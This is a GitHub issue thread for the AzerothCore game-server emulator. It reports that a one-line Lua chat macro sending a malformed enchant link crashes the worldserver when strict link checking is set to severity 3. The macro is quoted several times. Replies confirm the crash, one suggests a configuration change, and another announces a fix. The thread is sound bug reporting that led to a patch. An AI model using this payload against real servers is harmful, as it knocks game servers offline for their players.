This following script allows to make crash the server when ChatStrictLinkChecking.Severity = 3 in worldserver.conf.
Script:
/run function CrashServer() SendChatMessage("\124cffffd000\124Henchant:59387\124h[Inscription]\124h\124r", "SAY") end CrashServer()
Thanks @avatar789 (ZIC on discord) to discover this critical issue.
Issue related to https://github.com/azerothcore/azerothcore-wotlk/issues/2409
ChatStrictLinkChecking.Severity = 3 in worldserver.conf/run function CrashServer() SendChatMessage("\124cffffd000\124Henchant:59387\124h[Inscription]\124h\124r", "SAY") end CrashServer()
master
1914571cbac9206a71e0601c19345ced190d7d52
Tested on Ubuntu 18.04.3 LTS
no modules
Why doesn't my server crash....


I don't know, my server crash, be sure that your server is loading the right worldserver.conf with severity = 3.
@avatar789 tested too and got the same results.
I use this script, nothing else:
/run function CrashServer() SendChatMessage("\124cffffd000\124Henchant:59387\124h[Inscription]\124h\124r", "SAY") end CrashServer()
Tested and my Server crashed after executing the script with a level 1 player character (commit: fae7ae9).
Why doesn't my server crash....
- ChatStrictLinkChecking
change ChatFakeMessagePreventing from 0 to 1.
I have ChatFakeMessagePreventing = 0 and the server still crashes when I put severity=3.
Fixed, you can test the PR :wink:
Most helpful comment
Tested and my Server crashed after executing the script with a level 1 player character (commit: fae7ae9).